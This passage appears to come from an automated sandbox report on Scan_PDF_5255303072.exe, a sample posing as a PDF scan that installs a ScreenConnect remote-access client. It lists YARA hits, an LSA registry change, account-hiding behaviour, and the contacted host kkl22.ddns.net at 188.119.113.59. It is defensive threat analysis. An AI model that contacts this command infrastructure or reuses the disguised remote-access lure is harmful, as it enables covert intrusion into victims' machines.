Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Queries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C13704 CreateNamedPipeW, 8_2_05C13704
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_01AD4C6A RtlGetVersion, 8_2_01AD4C6A
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Modifies security policies related information
Source: C:\Windows\System32\msiexec.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages Jump to behavior
Yara detected ScreenConnect Tool
Source: Yara match File source: Scan_PDF_5255303072.exe, type: SAMPLE
Source: Yara match File source: 0.2.Scan_PDF_5255303072.exe.5bf0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.ScreenConnect.WindowsClient.exe.26bfa50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.ScreenConnect.WindowsClient.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Scan_PDF_5255303072.exe.5bf0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.Scan_PDF_5255303072.exe.40c3d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.Scan_PDF_5255303072.exe.3863d8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.Scan_PDF_5255303072.exe.435db8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.Scan_PDF_5255303072.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ScreenConnect.WindowsClient.exe.250fa90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1398979904.0000000005BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.1442912200.00000000003B2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2621215881.0000000002641000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1359612132.0000000000386000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1486728032.0000000002491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1385033934.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Scan_PDF_5255303072.exe PID: 7868, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 8128, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7136, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 980, type: MEMORYSTR
Source: Yara match File source: C:\Config.Msi\4a71ed.rbs, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe, type: DROPPED
Source: Yara match File source: C:\Windows\Installer\MSI74E9.tmp, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523874 Sample: Scan_PDF_5255303072.exe Startdate: 02/10/2024 Architecture: WINDOWS Score: 46 55 kkl22.ddns.net 2->55 61 Multi AV Scanner detection for submitted file 2->61 63 .NET source code contains potential unpacker 2->63 65 .NET source code references suspicious native API functions 2->65 69 4 other signatures 2->69 8 ScreenConnect.ClientService.exe 2 5 2->8         started        12 msiexec.exe 94 51 2->12         started        15 Scan_PDF_5255303072.exe 4 2->15         started        17 svchost.exe 2->17         started        signatures3 67 Uses dynamic DNS services 55->67 process4 dnsIp5 57 kkl22.ddns.net 188.119.113.59, 49710, 8041 SERVERIUS-ASNL Russian Federation 8->57 73 Reads the Security eventlog 8->73 75 Reads the System eventlog 8->75 19 ScreenConnect.WindowsClient.exe 2 8->19         started        22 ScreenConnect.WindowsClient.exe 2 8->22         started        45 C:\...\ScreenConnect.ClientService.exe, PE32 12->45 dropped 47 C:\Windows\Installer\MSI7A98.tmp, PE32 12->47 dropped 49 C:\Windows\Installer\MSI74FA.tmp, PE32 12->49 dropped 51 9 other files (none is malicious) 12->51 dropped 77 Enables network access during safeboot for specific services 12->77 79 Modifies security policies related information 12->79 24 msiexec.exe 12->24         started        26 msiexec.exe 1 12->26         started        28 msiexec.exe 12->28         started        81 Contains functionality to hide user accounts 15->81 30 msiexec.exe 6 15->30         started        file6 signatures7 process8 file9 71 Contains functionality to hide user accounts 19->71 33 rundll32.exe 10 24->33         started        53 C:\Users\user\AppData\Local\...\MSI6E42.tmp, PE32 30->53 dropped signatures10 process11 file12 37 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 33->37 dropped 39 C:\...\ScreenConnect.InstallerActions.dll, PE32 33->39 dropped 41 C:\Users\user\...\ScreenConnect.Core.dll, PE32 33->41 dropped 43 4 other files (none is malicious) 33->43 dropped 59 Contains functionality to hide user accounts 33->59 signatures13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.119.113.59
 kkl22.ddns.net Russian Federation
50673 SERVERIUS-ASNL true

Contacted Domains

Name IP Active
kkl22.ddns.net 188.119.113.59 true